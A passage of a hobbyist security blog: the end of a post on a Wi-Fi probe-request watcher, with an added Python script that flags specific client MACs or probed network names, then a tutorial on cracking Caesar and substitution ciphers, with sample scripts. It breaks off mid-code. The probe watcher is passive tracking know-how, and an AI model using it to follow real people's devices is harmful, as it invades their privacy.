<span style="color: lime;"><b>./shee.sh -i wlan4mon -M 3 -s</b></span></div>
</div>
<div>
<br /></div>
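As an added example that is not part of the original post or of shee.sh, the following Python script reads the three-field tshark output described above from a pipe and implements the same three modes (watched MAC, watched ESSID, log all clients), reporting a client in log-all mode only on its first sighting. The sample lines and MACs are constructed, and it assumes tshark's default tab-separated fields with repeated values joined by commas.<br />

```python
#!/usr/bin/env python3
"""Consume 'tshark ... -T fields -e wlan.sa -e radiotap.dbm_antsignal -e wlan_mgt.ssid' output.

Added example, not the post's shee.sh. Usage (tshark's -l keeps the pipe line-buffered):
  tshark -i mon0 -n -l subtype probe-req -T fields -e wlan.sa -e radiotap.dbm_antsignal \
      -e wlan_mgt.ssid | python3 probewatch.py 1 00-11-22-33-44-55
"""
import re
import sys
from dataclasses import dataclass, field
from typing import Iterable, List, Optional, Set

# Six hex octets joined by one consistent separator, either ':' or '-'
MAC_RE = re.compile(r"^[0-9a-f]{2}([:-])(?:[0-9a-f]{2}\1){4}[0-9a-f]{2}$", re.I)

# Constructed sample of tshark output (tab separated), not a real capture.
SAMPLE_LINES = [
    "00:11:22:33:44:55\t-52\tAwesome Sauce",
    "aa:bb:cc:dd:ee:ff\t-71\t",                    # empty SSID: broadcast (wildcard) probe
    "00:11:22:33:44:55\t-50\tAwesome Sauce",
    "aa:bb:cc:dd:ee:ff\t-70\tCoffeeShop,HomeNet",  # tshark joins repeated field values with ','
    "de:ad:be:ef:00:01\t-88\tAwesome Sauce",
    "not a probe line",                            # malformed input must be skipped, not crash
]


def normalize_mac(mac: str) -> Optional[str]:
    """Accept 00:11:22:33:44:55 or 00-11-22-33-44-55; return lowercase colon form, or None if invalid."""
    mac = mac.strip()
    if not MAC_RE.match(mac):
        return None
    return mac.lower().replace("-", ":")


@dataclass
class Probe:
    sa: str               # client MAC (wlan.sa)
    rssi: Optional[int]   # radiotap.dbm_antsignal, None if the field was empty
    ssids: List[str]      # probed ESSIDs, [] for a broadcast probe


def parse_line(line: str) -> Optional[Probe]:
    """Parse one tab-separated tshark fields line; return None for anything malformed."""
    parts = line.rstrip("\r\n").split("\t")
    if len(parts) != 3:
        return None
    sa = normalize_mac(parts[0])
    if sa is None:
        return None
    try:
        rssi: Optional[int] = int(parts[1])
    except ValueError:
        rssi = None
    ssids = [s for s in parts[2].split(",") if s]
    return Probe(sa, rssi, ssids)


@dataclass
class ProbeWatcher:
    """mode 1 = watch MACs, 2 = watch an ESSID, 3 = log every client (first sighting only)."""
    mode: int
    watch_macs: Set[str] = field(default_factory=set)
    watch_essid: Optional[str] = None
    seen: Set[str] = field(default_factory=set)

    def handle(self, line: str) -> Optional[str]:
        p = parse_line(line)
        if p is None:
            return None
        detail = f"{p.sa} rssi={p.rssi} ssid={','.join(p.ssids) or '<broadcast>'}"
        if self.mode == 1 and p.sa in self.watch_macs:
            return "KNOWN CLIENT " + detail
        if self.mode == 2 and self.watch_essid in p.ssids:
            return "ESSID PROBE " + detail
        if self.mode == 3 and p.sa not in self.seen:
            self.seen.add(p.sa)   # report each client once, not on every probe
            return "NEW CLIENT " + detail
        return None


def watch(lines: Iterable[str], watcher: ProbeWatcher) -> List[str]:
    """Run every line through the watcher and collect the alerts it raises."""
    return [a for a in (watcher.handle(line) for line in lines) if a]


if __name__ == "__main__":
    mode = int(sys.argv[1]) if len(sys.argv) > 1 else 3
    target = sys.argv[2] if len(sys.argv) > 2 else None
    if mode == 1 and normalize_mac(target or "") is None:
        sys.exit("mode 1 needs a valid MAC (00:11:22:33:44:55 or 00-11-22-33-44-55)")
    w = ProbeWatcher(mode,
                     watch_macs={normalize_mac(target)} if mode == 1 else set(),
                     watch_essid=target if mode == 2 else None)
    for raw in sys.stdin:
        alert = w.handle(raw)
        if alert:
            print(alert, flush=True)
```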
<div class="separator" style="clear: both; text-align: left;">
I will be slowly checking the script and improving where I can, but so far it seems like a decent start to the blog after a looong period of silence... (yes kids.. babies, houses and work do that :D )</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
As always, I appreciate any and all comments.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Script updated to v0.2 12-06-2015</div>
<div class="separator" style="clear: both; text-align: left;">
<b><u>Download link;</u></b></div>
<b><a href="http://www.mediafire.com/view/vz2nea6bv1hq779/shee.sh">http://www.mediafire.com/view/vz2nea6bv1hq779/shee.sh</a></b><br />
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<b>Useful/Interesting blogs/posts on this</b></div>
<div class="separator" style="clear: both; text-align: left;">
<b>============================</b></div>
<div class="separator" style="clear: both; text-align: left;">
<a href="https://urbanjack.wordpress.com/2013/05/25/capture-wifi-wlan-802-11-probe-request-with/">https://urbanjack.wordpress.com/2013/05/25/capture-wifi-wlan-802-11-probe-request-with/</a></div>
<div class="separator" style="clear: both; text-align: left;">
<a href="http://blog.rootshell.be/2012/01/12/show-me-your-ssids-ill-tell-who-you-are/">http://blog.rootshell.be/2012/01/12/show-me-your-ssids-ill-tell-who-you-are/</a></div>
<div class="separator" style="clear: both; text-align: left;">
<a href="http://www.securitytube.net/video/7265">http://www.securitytube.net/video/7265</a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
</div>
<b>Cracking Substitution Ciphers</b> (published 2013-05-29, updated 2014-08-30)<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
Substitution ciphers are a frequent part of many online challenges and CTF competitions, and are always fun to have a look at.<br />
<br />
Most of these types of ciphers are fairly easy to crack with just a pencil and paper method, but there are other, quicker ways to get the job done as well.<br />
<br />
<br />
The most frequently seen letter substitution ciphers are;<br />
<br />
> <b>Caesar shift ciphers</b><br />
Shifting the letters of the alphabet up a fixed number of letters to encode / decode a given text.<br />
> <b>Substitution ciphers</b><br />
Replacing the letters of the alphabet with randomly chosen letters to encode a given text.<br />
> <b>Position dependent shift ciphers</b><br />
Replacing letters at a certain position with a shifted value and repeating that position shift cycle on each word or sentence.<br />
<br />
<br />
<b>CAESAR SHIFT CIPHERS</b><br />
<b>=====================</b><br />
These are the easiest to identify and decode.<br />
Decoding can be done by simply writing out the alphabet and identifying the shift by trial and error and testing the (expected) correct outcome.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/SHIFT_TEST_zps3ef53031.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/SHIFT_TEST_zps3ef53031.jpg" height="64" width="640" /></a></div>
<br />
The most well known Caesar shift is the so-called ROT13, which can be used to both encode and decode a message by shifting the letters up 13 positions.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/ROT13_zps1070e26f.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/ROT13_zps1070e26f.jpg" height="82" width="640" /></a></div>
<br />
ROT13 messages are easy to encode / decode with a short one-liner using 'tr' ;<br />
<span style="color: lime;">echo "This is a test, one plus one is two" | tr a-zA-Z n-za-mN-ZA-M</span><br />
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/SHIFT-01_zpsbba9adbf.png" imageanchor="1" style="clear: left; display: inline !important; margin-bottom: 1em; margin-right: 1em; text-align: center;"><img border="0" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/SHIFT-01_zpsbba9adbf.png" height="170" width="640" /></a><br />
<br />
<br />
This can be expanded to include digits as well (sometimes referred to as ROT18), by replacing 0-4 with 5-9 and 5-9 with 0-4;<br />
<span style="color: lime;">echo "this is a test, 1 + 1 = 2" | tr a-zA-Z0-45-9 n-za-mN-ZA-M5-90-4</span><br />
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/rot18-a_zpse67f0d1b.png" imageanchor="1" style="clear: left; display: inline !important; margin-bottom: 1em; margin-right: 1em; text-align: center;"><img border="0" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/rot18-a_zpse67f0d1b.png" height="134" width="640" /></a><br />
<br />
<br />
The same principle of shifting letters can be used with any number of shifts.<br />
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/SHIFT24_zps76baec31.jpg" imageanchor="1" style="clear: left; display: inline !important; margin-bottom: 1em; margin-right: 1em; text-align: center;"><img border="0" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/SHIFT24_zps76baec31.jpg" height="92" width="640" /></a><br />
<br />
<br />
The easiest way to check for a Caesar shift cipher is to check all the possible shifts of a word, or sequence of words, and verify at what shift the text becomes readable.<br />
<br />
There are quite a few scripts / websites which can check and do this for you, but as a lot of them have some kind of limitation, and as I am one who enjoys re-inventing the wheel ;) I decided to have a crack at making a bash script doing the same as well.<br />
Introducing <a href="http://www.mediafire.com/download/3g8zfkj3uzwgt4t/cshift.sh" target="_blank">cshift</a><br />
<span style="color: red;"><b>Download:</b></span> <a href="http://www.mediafire.com/download/3g8zfkj3uzwgt4t/cshift.sh" target="_blank">http://www.mediafire.com/view/a9vnps7p015agpy/cshift_v0-4.sh</a><br />
<br />
Unlike many other solutions found on the interwebz, cshift allows upper and/or lower case, negative values, as well as values higher than 26 (so for instance a shift of -5 characters or of +49 characters)<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/cshift-01a_zpse2928a61.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/cshift-01a_zpse2928a61.png" height="518" width="640" /></a></div>
<br />
<div>
<br />
Running cshift on direct input (<i>quotes!</i>);<br />
<span style="color: lime;">./cshift.sh -i 'Jhlzhy Zhshk' -s 19</span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/cshift-11a_zps9f7c5446.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/cshift-11a_zps9f7c5446.png" height="202" width="640" /></a></div>
<br />
Running cshift on an example text file 'test.txt';<br />
<span style="color: lime;">cat test.txt</span><br />
<span style="color: lime;">./cshift.sh -i test.txt -s 7</span><br />
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/cshift-12a_zps5bcfb7bb.png" imageanchor="1" style="clear: left; display: inline !important; margin-bottom: 1em; margin-right: 1em; text-align: center;"><img border="0" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/cshift-12a_zps5bcfb7bb.png" height="202" width="640" /></a><br />
<br />
<br />
<br />
<b>'Bruteforce' checking of all possibilities.</b><br />
<br />
Let's have a look at the following text (and assume it is part of an encoded text file)<br />
<i>(different shift value used, not the same as the above example)</i>;</div>
<blockquote class="tr_bq">
<b><span style="color: yellow;">hgdlwjywaklk afvmuw sfykl</span></b></blockquote>
Using cshift's <b>-b</b> switch for the 'bruteforce' function, we can check all the possible shifts and see which shift gives a readable outcome (this is best done on a short sequence of words, to be able to correctly ascertain shift values).<br />
<br />
<span style="color: lime;">./cshift.sh -i 'hgdlwjywaklk afvmuw sfykl' -b</span><br />
(don't like colours? add the -c switch; <span style="color: lime;">./cshift.sh -i 'hgdlwjywaklk afvmuw sfykl' -bc</span>)<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/cshift-02a_zps22edb690.png" imageanchor="1" style="clear: left; display: inline !important; margin-bottom: 1em; margin-right: 1em; text-align: center;"><img border="0" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/cshift-02a_zps22edb690.png" height="518" width="640" /></a><br />
<br />
<br />
For possibly less well known words (or if the above colours have half blinded you, preventing recognition of readable text..), this can be further simplified by using cshift's <b>-w</b> switch, which allows the bruteforce output to be checked against a given dictionary or wordlist (use a small wordlist! it's slow..).<br />
In this case I have chosen to check against the <a href="http://cfaj.freeshell.org/wf/UKACD17.shtml" target="_blank">UKACD</a> list, which is a small wordlist for crossword puzzles etc.<br />
<br />
For correct results this test should be done on a <b><u>single long word</u></b> (this also helps avoid false positives).<br />
<span style="color: lime;">./cshift.sh -i 'hgdlwjywaklk' -b -w ukacd.txt</span><br />
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/cshift-03a_zpsa1bab2c8.png" imageanchor="1" style="clear: left; display: inline !important; margin-bottom: 1em; margin-right: 1em; text-align: center;"><img border="0" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/cshift-03a_zpsa1bab2c8.png" height="568" width="640" /></a><br />
<br />
<br />
So with either just the 'bruteforce' <b>-b</b> switch or together with the <b>-w</b> switch we can see that a shift of 8 letters gives readable text and can use that value to decode the full text / text file.<br />
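The shift, bruteforce and wordlist checks above, as an added Python example (not the post's cshift.sh): shifts are taken modulo 26 so negative and over-26 values work, and the wordlist is a constructed stand-in for ukacd.txt.<br />

```python
#!/usr/bin/env python3
"""Caesar shift helpers mirroring what cshift's -s, -b and -w switches do.

Added example, not the post's cshift.sh. WORDLIST is a constructed stand-in for UKACD;
point it at a real list for real use.
"""
import string
from typing import List, Set, Tuple

LOWER = string.ascii_lowercase
UPPER = string.ascii_uppercase

# Constructed mini wordlist standing in for ukacd.txt
WORDLIST: Set[str] = {"caesar", "salad", "poltergeists", "induce", "angst",
                      "the", "test", "one", "plus", "two", "is", "a"}


def caesar(text: str, shift: int) -> str:
    """Shift every letter `shift` places, keeping case and leaving other characters alone.
    The shift is taken modulo 26, so -5 behaves as 21 and +49 as 23 (like cshift)."""
    k = shift % 26
    table = str.maketrans(LOWER + UPPER,
                          LOWER[k:] + LOWER[:k] + UPPER[k:] + UPPER[:k])
    return text.translate(table)


def rot13(text: str) -> str:
    """Same as: tr a-zA-Z n-za-mN-ZA-M"""
    return caesar(text, 13)


def rot18(text: str) -> str:
    """ROT13 plus the digit swap 0-4 <-> 5-9: tr a-zA-Z0-45-9 n-za-mN-ZA-M5-90-4"""
    table = str.maketrans(string.digits, "5678901234")
    return rot13(text).translate(table)


def brute(text: str) -> List[Tuple[int, str]]:
    """All 26 candidate decodings, like cshift -b."""
    return [(k, caesar(text, k)) for k in range(26)]


def score(candidate: str, wordlist: Set[str]) -> int:
    """Number of whitespace-separated tokens found in the wordlist (punctuation stripped)."""
    tokens = (t.strip(string.punctuation).lower() for t in candidate.split())
    return sum(1 for t in tokens if t and t in wordlist)


def best_shift(text: str, wordlist: Set[str]) -> Tuple[int, str, int]:
    """Like cshift -b -w: (shift, decoding, hits) for the shift with the most wordlist hits."""
    return max(((k, c, score(c, wordlist)) for k, c in brute(text)), key=lambda t: t[2])


if __name__ == "__main__":
    for k, c in brute("hgdlwjywaklk afvmuw sfykl"):
        print(f"{k:2d}: {c}")
    print(best_shift("hgdlwjywaklk afvmuw sfykl", WORDLIST))
```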
<br />
<br />
<br />
<b>SUBSTITUTION CIPHERS</b><br />
<b>======================</b><br />
These are slightly harder depending on the amount of text given to work with.<br />
The less text you have to work with, the harder it is.<br />
<br />
Given a substantial amount of text, you can run a letter frequency analysis on the text and check the most frequent letters to create a starting point.<br />
From there it is a matter of a decent vocabulary combined with some trial and error.<br />
<br />
When looking at a text encoded with a substitution cipher, it is handy to take note of a few things (based on the text being in English);<br />
<ul style="text-align: left;">
<li>The letter 'E' is the most frequent letter in English, so it stands to reason that the most frequent letter in the encoded text could stand for an 'E'.</li>
<li>The letter 'T' is the 2nd most frequent letter in English.</li>
<li>Look for single character words; in an English text single letter words will be either 'A' or 'I'.</li>
<li>The word 'the' is the most frequent 3-character word used in English, it is also the most frequently used word in general in English.</li>
</ul>
Using the above, you can usually create a solid starting point and work forward from there.<br />
<br />
Some helpful information on letter and word frequencies in English can be found here;<br />
<a href="http://scottbryce.com/cryptograms/stats.htm">http://scottbryce.com/cryptograms/stats.htm</a><br />
<br />
<br />
Let's have a look at a test file '<a href="http://www.mediafire.com/download/xarxaodj7000ldc/manifesto.txt" target="_blank">manifesto.txt</a>'<br />
<br />
Using the <b>-f</b> switch in cshift we can do a rudimentary letter frequency analysis on the above text file;<br />
<span style="color: lime;">./cshift.sh -i manifesto.txt -f</span><br />
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/subs-01_zpsf28c723b.png" imageanchor="1" style="clear: left; display: inline !important; margin-bottom: 1em; margin-right: 1em; text-align: center;"><img border="0" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/subs-01_zpsf28c723b.png" height="546" width="640" /></a><br />
<br />
<br />
Now that we have the letter analysis on the whole file, let's cut out the first few lines and work on those for a bit;<br />
<span style="color: lime;">head -n 25 manifesto.txt > new.txt</span><br />
<span style="color: lime;">cat new.txt</span><br />
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/subs-01a_zps069eaeb5.png" imageanchor="1" style="clear: left; display: inline !important; margin-bottom: 1em; margin-right: 1em; text-align: center;"><img border="0" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/subs-01a_zps069eaeb5.png" height="450" width="640" /></a><br />
<br />
<br />
From the previous letter frequency analysis it looks most likely that;<br />
K = E<br />
A = T<br />
<br />
We see that there are two single letter words in use, u &amp; w.<br />
So, either;<br />
U = A &amp; W = I or U = I &amp; W = A<br />
From the use of apostrophes following U in the text, it seems that U = I &amp; W = A<br />
<br />
I use a simple replacement/substitution script using 'sed' with lines written out line by line to make it easier to check and alter as needed.<br />
To make it 'easier' to read I lower case all letters in the text and put substitutions in upper case, then keep on running it on the text file with expected substitutions until words start appearing.<br />
<blockquote class="tr_bq">
<span style="color: yellow;">#!/bin/bash</span><br />
<span style="color: yellow;">#replace.sh</span><br />
<span style="color: yellow;"># change the right-hand side of a rule to an upper-case letter (e.g. 's/k/E/g') to apply a guessed substitution</span><br />
<span style="color: yellow;">cat $1 | tr '[:upper:]' '[:lower:]' | sed \</span><br />
<span style="color: yellow;">-e 's/a/a/g' \</span><br />
<span style="color: yellow;">-e 's/b/b/g' \</span><br />
<span style="color: yellow;">-e 's/c/c/g' \</span><br />
<span style="color: yellow;">-e 's/d/d/g' \</span><br />
<span style="color: yellow;">-e 's/e/e/g' \</span><br />
<span style="color: yellow;">-e 's/f/f/g' \</span><br />
<span style="color: yellow;">-e 's/g/g/g' \</span><br />
<span style="color: yellow;">-e 's/h/h/g' \</span><br />
<span style="color: yellow;">-e 's/i/i/g' \</span><br />
<span style="color: yellow;">-e 's/j/j/g' \</span><br />
<span style="color: yellow;">-e 's/k/k/g' \</span><br />
<span style="color: yellow;">-e 's/l/l/g' \</span><br />
<span style="color: yellow;">-e 's/m/m/g' \</span><br />
<span style="color: yellow;">-e 's/n/n/g' \</span><br />
<span style="color: yellow;">-e 's/o/o/g' \</span><br />
<span style="color: yellow;">-e 's/p/p/g' \</span><br />
<span style="color: yellow;">-e 's/q/q/g' \</span><br />
<span style="color: yellow;">-e 's/r/r/g' \</span><br />
<span style="color: yellow;">-e 's/s/s/g' \</span><br />
<span style="color: yellow;">-e 's/t/t/g' \</span><br />
<span style="color: yellow;">-e 's/u/u/g' \</span><br />
<span style="color: yellow;">-e 's/v/v/g' \</span><br />
<span style="color: yellow;">-e 's/w/w/g' \</span><br />
<span style="color: yellow;">-e 's/x/x/g' \</span><br />
<span style="color: yellow;">-e 's/y/y/g' \</span><br />
<span style="color: yellow;">-e 's/z/z/g'</span><br />
<span style="color: yellow;">echo</span><br />
<span style="color: yellow;">exit 0</span></blockquote>
<i>(This is actually also included in cshift with the -r switch, [<span style="color: lime;">./cshift -i input.file -r</span>] but it is not practical, as using it means continuously editing the script in nano and possibly risking fubarring the whole script ;) use with care !) </i><br />
<br />
Let's enter the aforementioned probable substitutions in the replace.sh script and check the outcome.<br />
<span style="color: lime;">./replace.sh new.txt</span><br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/comb-01_zps871b7efa.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/comb-01_zps871b7efa.png" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
From that outcome it becomes clear that ;<br />
X = H<br />
And also following the use of apostrophes we can deduce that ;<br />
N = S<br />
<br />
After entering the above and re-running the script, from the part of text that is (semi-)readable we can further deduce that ;<br />
D = N<br />
M = M<br />
And with a calculated guess (based on thinking of the word TEACH) try T = C<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
After entering the above substitutions and running the script again ;<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/comb-02_zps528bf8df.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/comb-02_zps528bf8df.png" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Now you are already well on your way in just a couple of steps.<br />
<br />
Going through the text carefully, you will find that ;<br />
R = K<br />
S = R<br />
L = D<br />
Y = Y<br />
O = L<br />
<br />
Entering those values in the script and running it ;<br />
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/comb-03_zpsbe5f3447.png" imageanchor="1" style="clear: left; display: inline !important; margin-bottom: 1em; margin-right: 1em; text-align: center;"><img border="0" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/comb-03_zpsbe5f3447.png" /></a><br />
<br />
Now it's easy to identify the other letters and solve the text ;<br />
Q = F<br />
V = B<br />
F = W<br />
P = O<br />
C = G<br />
I = U<br />
J = V<br />
E = P<br />
G = J<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/comb-04_zps0b3a6342.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/comb-04_zps0b3a6342.png" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
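As an added example (not the post's own script), here is the same approach in Python: lower-case the ciphertext, write solved letters in upper case, and apply the key in one pass. The sample ciphertext is constructed for this example (it is 'I CAN TEACH A CAT' encrypted with the key the post arrives at), and the function names are mine, not the post's.<br />

```python
# Added example (not the post's own code): the replace.sh workflow in Python.
# Ciphertext is lower-cased, every letter the key already accounts for is
# written as its UPPER-CASE plaintext guess and the rest stays lower-case,
# so a partly solved text shows at a glance which letters are still open.
from __future__ import annotations

from collections import Counter

# Constructed sample ciphertext: "I CAN TEACH A CAT" encrypted with the
# inverse of the key the post arrives at (the sample is not from the post).
CIPHERTEXT = "u twd akwtx w twa"

# The first guesses from the post: frequency (K=E, A=T) and the single-letter words.
PARTIAL_KEY = {"k": "E", "a": "T", "u": "I", "w": "A"}

# The complete key as assembled in the post (three cipher letters never occur).
FULL_KEY = {
    "k": "E", "a": "T", "u": "I", "w": "A", "x": "H", "n": "S", "d": "N",
    "m": "M", "t": "C", "r": "K", "s": "R", "l": "D", "y": "Y", "o": "L",
    "q": "F", "v": "B", "f": "W", "p": "O", "c": "G", "i": "U", "j": "V",
    "e": "P", "g": "J",
}


def letter_frequency(text: str) -> list[tuple[str, int]]:
    """Letters of the ciphertext, most frequent first (ties broken alphabetically)."""
    counts = Counter(c for c in text.lower() if c.isalpha())
    return sorted(counts.items(), key=lambda kv: (-kv[1], kv[0]))


def single_letter_words(text: str) -> set[str]:
    """Cipher letters that stand alone as words: in English they are usually A or I."""
    return {w for w in text.lower().split() if len(w) == 1 and w.isalpha()}


def substitute(text: str, key: dict[str, str]) -> str:
    """Apply the whole key in one pass with str.translate.

    Unlike a chain of sed -e 's/x/Y/g' expressions, a single translate table
    cannot re-map a letter that an earlier rule has already produced, so the
    order in which guesses were added never matters.
    """
    table = str.maketrans({c: p.upper() for c, p in key.items()})
    return text.lower().translate(table)


def check_key(key: dict[str, str]) -> list[str]:
    """Plaintext letters claimed by more than one cipher letter (a key with any is wrong)."""
    seen = Counter(p.upper() for p in key.values())
    return sorted(p for p, n in seen.items() if n > 1)


if __name__ == "__main__":
    print(letter_frequency(CIPHERTEXT)[:3])
    print(single_letter_words(CIPHERTEXT))
    print(substitute(CIPHERTEXT, PARTIAL_KEY))   # I tAd TEAtx A tAT
    print(substitute(CIPHERTEXT, FULL_KEY))      # I CAN TEACH A CAT
```

The one-pass translate table is the point: with chained sed expressions a later s/x/Y/g can re-map a letter an earlier rule already produced unless the upper/lower-case convention is kept strictly, whereas translate looks each character up exactly once. check_key() catches the other classic slip, two cipher letters assigned to the same plaintext letter.<br />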
<span style="color: cyan;">Now to show you how to make it even easier ;)</span><br />
<br />
<b>lightningmanic</b> shared a great frequency_analysis JavaScript tool on the <a href="http://top-hat-sec.com/forum/index.php?topic=2997.0" target="_blank">THS forums</a>, including excellent explanations on substitution ciphers and the decoding of same.<br />
This JavaScript tool does a much better job than my attempts with the above bash scripts and should definitely be in your toolbox if you enjoy this kind of thing.<br />
Download FreqA ;<br />
<a href="http://www.mediafire.com/download/y1f6pjbyae3xkjb/FreqA.zip">http://www.mediafire.com/download/y1f6pjbyae3xkjb/FreqA.zip</a><br />
<br />
<br />
Check the FreqA.zip file contents and then unzip ;<br />
<span style="color: lime;">unzip -l FreqA.zip</span><br />
<span style="color: lime;">unzip FreqA.zip</span><br />
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/freq-02_zps87259a74.png" imageanchor="1" style="clear: left; display: inline !important; margin-bottom: 1em; margin-right: 1em; text-align: center;"><img border="0" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/freq-02_zps87259a74.png" height="388" width="640" /></a><br />
<br />
<br />
Then open the <b>index.html</b> file in your web browser.<br />
As it is written in JavaScript it should work in most modern browsers on most OSes.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/freq03_zpsa8f8a66e.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/freq03_zpsa8f8a66e.png" height="506" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/freq04_zps83f8068c.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/freq04_zps83f8068c.png" height="640" width="638" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
The script is awesome, it shows the letter frequency analysis, most common two and three letter sequences, and a very quick and easy way to check substitutions.<br />
<br />
For quick checks on letter substitution encoded text, this script is definitely what I will be using first.<br />
Thanks for the share lightningmanic !<br />
<br />
<br />
<br />
<br />
<b>POSITION DEPENDENT SHIFT CIPHERS</b><br />
<b>===================================</b><br />
<br />
These are more complicated to crack; sometimes they come with a hint, sometimes it is left to the user to figure out.<br />
<br />
There are too many variations to go into in much depth, but the basic idea is that each letter is shifted by a number of places that depends on its position in the word or sentence.<br />
<br />
So for instance the word 'computer' with the shift '2, 4, 6.. ' could be encoded into ;<br />
c=(c + 2) == E<br />
o=(o + 4) == S<br />
m=(m + 6) == S<br />
p=(p + 8) == X<br />
u=(u + 10) == E<br />
t=(t + 12) == F<br />
e=(e + 14) == S<br />
r=(r + 16) == H<br />
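As an added example (not from the post), the 'computer' shift carried through in Python, written generally so that any shift sequence can be tried. The handling of spaces and punctuation (passed through and not counted as positions) is my assumption, as the post only shows a single word; the function names are mine.<br />

```python
# Added example (not the post's own code): the position-dependent shift the
# post illustrates with 'computer' and the sequence 2, 4, 6, ...
# The shift for letter position i (0-based, letters only) comes from a
# function, so other sequences (a fixed key list, any arithmetic rule) can
# be tried without rewriting the loop.
from __future__ import annotations

from typing import Callable

ALPHABET = "abcdefghijklmnopqrstuvwxyz"


def position_shift(text: str, shift_at: Callable[[int], int], decrypt: bool = False) -> str:
    """Shift each letter by shift_at(i) places; non-letters pass through and do not advance i.

    Assumption: the post shows one word only, so how spaces and punctuation are
    treated is a choice made here. Output is upper case like the post's example.
    """
    out = []
    i = 0
    for ch in text:
        low = ch.lower()
        if low not in ALPHABET:
            out.append(ch)
            continue
        k = shift_at(i) % 26
        if decrypt:
            k = -k                      # undo the shift for this position
        out.append(ALPHABET[(ALPHABET.index(low) + k) % 26].upper())
        i += 1
    return "".join(out)


def even_sequence(i: int) -> int:
    """The post's sequence: 2, 4, 6, ... for the 1st, 2nd, 3rd letter."""
    return 2 * (i + 1)


def from_key(key: list[int]) -> Callable[[int], int]:
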